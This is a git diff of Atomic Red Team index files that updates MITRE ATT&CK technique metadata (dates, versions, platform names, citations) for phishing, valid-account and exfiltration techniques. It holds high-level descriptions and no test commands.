       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -59890,36 +60811,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -59948,9 +60852,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -59968,7 +60872,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -60006,11 +60914,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -60027,7 +60934,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -60037,7 +60943,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -60046,19 +60952,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -60106,11 +61010,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -60130,10 +61035,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -60166,7 +61069,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -60205,7 +61107,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -60220,7 +61122,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -60300,11 +61201,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60360,11 +61260,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -60425,8 +61324,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -60454,13 +61353,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -60500,8 +61398,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -60509,13 +61409,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -60546,9 +61446,6 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -60670,7 +61567,7 @@ initial-access:
           '
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -60737,11 +61634,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60793,15 +61689,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60825,10 +61720,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -60847,13 +61741,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -60892,9 +61785,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -60944,7 +61836,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -60964,7 +61855,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60984,8 +61875,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -61032,7 +61921,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -61052,7 +61940,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -61074,8 +61962,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -61129,7 +62015,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -61154,7 +62039,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -61189,12 +62074,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -61219,11 +62102,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -61266,9 +62148,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -61315,7 +62196,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -61341,7 +62221,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61374,13 +62254,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -61429,12 +62307,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -61470,12 +62347,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -61484,7 +62360,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -61508,9 +62383,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -61533,7 +62407,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61555,8 +62429,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -61607,7 +62479,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -61657,7 +62528,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -61682,7 +62552,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -61705,13 +62575,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -61752,9 +62620,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -61802,7 +62669,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -61824,7 +62690,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61848,12 +62714,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61917,6 +62781,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 80eeab0e97..404f7e131e 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,8 +97,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests:
     - name: Process Injection via Extra Window Memory (EWM) x64 executable
@@ -137,7 +135,7 @@ defense-evasion:
         elevation_required: false
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -200,21 +198,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
